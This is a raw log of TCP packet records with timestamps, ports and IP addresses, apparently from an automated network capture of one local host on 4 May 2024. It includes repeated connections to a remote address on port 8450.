May 4, 2024 09:50:41.473184109 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.473190069 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.473212004 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.473234892 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.474039078 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.474059105 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.474095106 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.474101067 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.474119902 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.474145889 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.474980116 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.474999905 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.475033998 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.475039959 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.475075960 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.475094080 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.475895882 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.475914955 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.475943089 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.475949049 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.475986958 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.476011992 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.476654053 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.476672888 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.476700068 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.476706028 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.476747990 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.477536917 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.477557898 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.477600098 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.477607012 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.477627993 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.477648973 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.478518963 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.478538036 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.478575945 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.478581905 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.478615046 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.478634119 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.479445934 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.479464054 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.479526043 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.479532003 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.479578018 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.480195045 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.480215073 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.480248928 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.480285883 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.480289936 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.480323076 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.481098890 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.481117964 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.481184959 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.481184959 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.481192112 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.481241941 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.482228994 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.482249975 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.482301950 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.482309103 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.482357979 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.482955933 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.482979059 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.483009100 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.483015060 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.483051062 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.483073950 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.483910084 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.483928919 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.483963966 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.483969927 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.483994007 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.484011889 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.484774113 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.484793901 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.484821081 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.484827042 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.484850883 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.484873056 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.485704899 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.485728979 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.485766888 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.485774040 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.485809088 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.485826969 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.486676931 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.486697912 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.486723900 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.486731052 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.486752033 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.486777067 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.487482071 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.487503052 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.487535000 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.487540007 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.487575054 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.487592936 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.488498926 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.488521099 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.488548040 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.488554001 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.488576889 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.488598108 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.489367962 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.489387035 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.489425898 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.489432096 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.489451885 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.489474058 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.490346909 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.490367889 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.490401030 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.490406036 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.490423918 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.490444899 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.491131067 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.491149902 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.491168976 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.491174936 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.491200924 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.491211891 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.492003918 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.492022991 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.492053986 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.492059946 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.492069960 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.492080927 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.492111921 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.492116928 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.492151976 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.492161036 CEST	443	49733	104.21.45.138	192.168.2.3
May 4, 2024 09:50:41.492204905 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:41.494458914 CEST	49733	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:47.177931070 CEST	49708	80	192.168.2.3	72.21.81.240
May 4, 2024 09:50:47.339309931 CEST	80	49708	72.21.81.240	192.168.2.3
May 4, 2024 09:50:47.339375019 CEST	49708	80	192.168.2.3	72.21.81.240
May 4, 2024 09:50:52.181750059 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:52.181804895 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:52.181972980 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:52.182298899 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:52.182315111 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:52.624861002 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:52.624994993 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:52.627146006 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:52.627156019 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:52.627422094 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:52.628453016 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:52.676125050 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.052613974 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.052649021 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.052731991 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.052759886 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.098910093 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.268256903 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.268273115 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.268311977 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.268376112 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.268414021 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.268433094 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.268443108 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.268485069 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.306061029 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.306162119 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.484764099 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.484849930 CEST	443	49734	131.153.147.50	192.168.2.3
May 4, 2024 09:50:53.484880924 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:53.484920025 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:54.112086058 CEST	49734	443	192.168.2.3	131.153.147.50
May 4, 2024 09:50:55.306509018 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:55.306559086 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:55.306623936 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:55.307013988 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:55.307030916 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:55.983031034 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:55.983109951 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:55.985790968 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:55.985804081 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:55.986068010 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:55.987791061 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.032124043 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647308111 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647335052 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647384882 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647411108 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.647427082 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647437096 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647445917 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.647488117 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.647495031 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.650697947 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.653038979 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.653063059 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.653073072 CEST	49735	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:56.653079033 CEST	443	49735	20.12.23.50	192.168.2.3
May 4, 2024 09:50:56.919951916 CEST	49736	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:50:57.265594959 CEST	8450	49736	12.221.146.138	192.168.2.3
May 4, 2024 09:50:57.804438114 CEST	49736	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:50:58.150568008 CEST	8450	49736	12.221.146.138	192.168.2.3
May 4, 2024 09:50:58.801831007 CEST	49736	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:50:59.149274111 CEST	8450	49736	12.221.146.138	192.168.2.3
May 4, 2024 09:50:59.801831007 CEST	49736	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:00.149878979 CEST	8450	49736	12.221.146.138	192.168.2.3
May 4, 2024 09:51:00.801824093 CEST	49736	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:01.151827097 CEST	8450	49736	12.221.146.138	192.168.2.3
May 4, 2024 09:51:01.273642063 CEST	49737	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:01.624958992 CEST	8450	49737	12.221.146.138	192.168.2.3
May 4, 2024 09:51:02.145595074 CEST	49737	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:02.491120100 CEST	8450	49737	12.221.146.138	192.168.2.3
May 4, 2024 09:51:03.036406994 CEST	49737	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:03.382095098 CEST	8450	49737	12.221.146.138	192.168.2.3
May 4, 2024 09:51:04.036221981 CEST	49737	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:04.382291079 CEST	8450	49737	12.221.146.138	192.168.2.3
May 4, 2024 09:51:05.010724068 CEST	49737	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:05.356844902 CEST	8450	49737	12.221.146.138	192.168.2.3
May 4, 2024 09:51:05.465776920 CEST	49738	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:05.815592051 CEST	8450	49738	12.221.146.138	192.168.2.3
May 4, 2024 09:51:06.317156076 CEST	49738	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:06.663791895 CEST	8450	49738	12.221.146.138	192.168.2.3
May 4, 2024 09:51:07.207623005 CEST	49738	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:07.553917885 CEST	8450	49738	12.221.146.138	192.168.2.3
May 4, 2024 09:51:08.115906000 CEST	49738	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:08.462471962 CEST	8450	49738	12.221.146.138	192.168.2.3
May 4, 2024 09:51:09.010546923 CEST	49738	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:09.359405994 CEST	8450	49738	12.221.146.138	192.168.2.3
May 4, 2024 09:51:09.476819038 CEST	49739	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:09.824734926 CEST	8450	49739	12.221.146.138	192.168.2.3
May 4, 2024 09:51:10.349237919 CEST	49739	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:10.695487976 CEST	8450	49739	12.221.146.138	192.168.2.3
May 4, 2024 09:51:11.349173069 CEST	49739	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:11.699630022 CEST	8450	49739	12.221.146.138	192.168.2.3
May 4, 2024 09:51:12.349272013 CEST	49739	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:12.695657015 CEST	8450	49739	12.221.146.138	192.168.2.3
May 4, 2024 09:51:13.296672106 CEST	49739	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:13.642319918 CEST	8450	49739	12.221.146.138	192.168.2.3
May 4, 2024 09:51:13.745206118 CEST	49740	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:14.091969967 CEST	8450	49740	12.221.146.138	192.168.2.3
May 4, 2024 09:51:14.114192963 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:51:14.114216089 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:51:14.635919094 CEST	49740	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:14.981102943 CEST	8450	49740	12.221.146.138	192.168.2.3
May 4, 2024 09:51:15.536076069 CEST	49740	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:15.882065058 CEST	8450	49740	12.221.146.138	192.168.2.3
May 4, 2024 09:51:16.442346096 CEST	49740	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:16.788346052 CEST	8450	49740	12.221.146.138	192.168.2.3
May 4, 2024 09:51:17.348593950 CEST	49740	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:17.694399118 CEST	8450	49740	12.221.146.138	192.168.2.3
May 4, 2024 09:51:17.805005074 CEST	49741	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:18.150897026 CEST	8450	49741	12.221.146.138	192.168.2.3
May 4, 2024 09:51:18.707739115 CEST	49741	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:19.053230047 CEST	8450	49741	12.221.146.138	192.168.2.3
May 4, 2024 09:51:19.613878012 CEST	49741	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:19.960397005 CEST	8450	49741	12.221.146.138	192.168.2.3
May 4, 2024 09:51:20.521282911 CEST	49741	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:20.866997004 CEST	8450	49741	12.221.146.138	192.168.2.3
May 4, 2024 09:51:21.517421007 CEST	49741	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:21.868813992 CEST	8450	49741	12.221.146.138	192.168.2.3
May 4, 2024 09:51:21.977737904 CEST	49743	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:22.323193073 CEST	8450	49743	12.221.146.138	192.168.2.3
May 4, 2024 09:51:23.008490086 CEST	49743	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:23.354331017 CEST	8450	49743	12.221.146.138	192.168.2.3
May 4, 2024 09:51:23.911614895 CEST	49743	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:24.258029938 CEST	8450	49743	12.221.146.138	192.168.2.3
May 4, 2024 09:51:24.802298069 CEST	49743	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:25.153091908 CEST	8450	49743	12.221.146.138	192.168.2.3
May 4, 2024 09:51:25.392477989 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:25.392513990 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:25.392580032 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:25.392919064 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:25.392930031 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:25.728226900 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:25.735480070 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:25.735495090 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:25.735919952 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:25.742314100 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:25.742389917 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:25.802267075 CEST	49743	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:25.802294016 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:26.150067091 CEST	8450	49743	12.221.146.138	192.168.2.3
May 4, 2024 09:51:26.257451057 CEST	49745	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:26.604274035 CEST	8450	49745	12.221.146.138	192.168.2.3
May 4, 2024 09:51:27.143955946 CEST	49745	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:27.489465952 CEST	8450	49745	12.221.146.138	192.168.2.3
May 4, 2024 09:51:28.037419081 CEST	49745	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:28.384536982 CEST	8450	49745	12.221.146.138	192.168.2.3
May 4, 2024 09:51:29.037483931 CEST	49745	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:29.384022951 CEST	8450	49745	12.221.146.138	192.168.2.3
May 4, 2024 09:51:30.037437916 CEST	49745	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:30.234168053 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:51:30.234281063 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:51:30.234340906 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:51:30.383084059 CEST	8450	49745	12.221.146.138	192.168.2.3
May 4, 2024 09:51:34.163688898 CEST	49746	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:34.510127068 CEST	8450	49746	12.221.146.138	192.168.2.3
May 4, 2024 09:51:35.020970106 CEST	49746	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:35.366662979 CEST	8450	49746	12.221.146.138	192.168.2.3
May 4, 2024 09:51:35.763479948 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:35.763566017 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:35.763641119 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:35.880383015 CEST	49746	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:36.226082087 CEST	8450	49746	12.221.146.138	192.168.2.3
May 4, 2024 09:51:36.645029068 CEST	49744	443	192.168.2.3	142.250.68.68
May 4, 2024 09:51:36.645056963 CEST	443	49744	142.250.68.68	192.168.2.3
May 4, 2024 09:51:36.738353014 CEST	49746	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:37.084079027 CEST	8450	49746	12.221.146.138	192.168.2.3
May 4, 2024 09:51:37.598840952 CEST	49746	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:37.944381952 CEST	8450	49746	12.221.146.138	192.168.2.3
May 4, 2024 09:51:38.053968906 CEST	49747	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:38.402563095 CEST	8450	49747	12.221.146.138	192.168.2.3
May 4, 2024 09:51:39.035979033 CEST	49747	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:39.381053925 CEST	8450	49747	12.221.146.138	192.168.2.3
May 4, 2024 09:51:40.035963058 CEST	49747	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:40.382292032 CEST	8450	49747	12.221.146.138	192.168.2.3
May 4, 2024 09:51:41.035976887 CEST	49747	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:41.381269932 CEST	8450	49747	12.221.146.138	192.168.2.3
May 4, 2024 09:51:42.036725998 CEST	49747	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:42.381956100 CEST	8450	49747	12.221.146.138	192.168.2.3
May 4, 2024 09:51:42.492335081 CEST	49748	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:42.838315964 CEST	8450	49748	12.221.146.138	192.168.2.3
May 4, 2024 09:51:43.345803976 CEST	49748	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:43.691301107 CEST	8450	49748	12.221.146.138	192.168.2.3
May 4, 2024 09:51:44.344396114 CEST	49748	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:44.689822912 CEST	8450	49748	12.221.146.138	192.168.2.3
May 4, 2024 09:51:45.348746061 CEST	49748	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:45.694184065 CEST	8450	49748	12.221.146.138	192.168.2.3
May 4, 2024 09:51:46.348902941 CEST	49748	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:46.696568966 CEST	8450	49748	12.221.146.138	192.168.2.3
May 4, 2024 09:51:46.803625107 CEST	49749	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:47.151334047 CEST	8450	49749	12.221.146.138	192.168.2.3
May 4, 2024 09:51:47.660950899 CEST	49749	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:48.006198883 CEST	8450	49749	12.221.146.138	192.168.2.3
May 4, 2024 09:51:48.520359993 CEST	49749	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:48.869200945 CEST	8450	49749	12.221.146.138	192.168.2.3
May 4, 2024 09:51:49.382519007 CEST	49749	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:49.728251934 CEST	8450	49749	12.221.146.138	192.168.2.3
May 4, 2024 09:51:50.229579926 CEST	49749	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:50.574858904 CEST	8450	49749	12.221.146.138	192.168.2.3
May 4, 2024 09:51:50.694417000 CEST	49751	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:51.040173054 CEST	8450	49751	12.221.146.138	192.168.2.3
May 4, 2024 09:51:51.551846027 CEST	49751	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:51.897320032 CEST	8450	49751	12.221.146.138	192.168.2.3
May 4, 2024 09:51:52.411227942 CEST	49751	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:52.756692886 CEST	8450	49751	12.221.146.138	192.168.2.3
May 4, 2024 09:51:53.261224985 CEST	49751	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:53.606796980 CEST	8450	49751	12.221.146.138	192.168.2.3
May 4, 2024 09:51:54.113852024 CEST	49751	8450	192.168.2.3	12.221.146.138
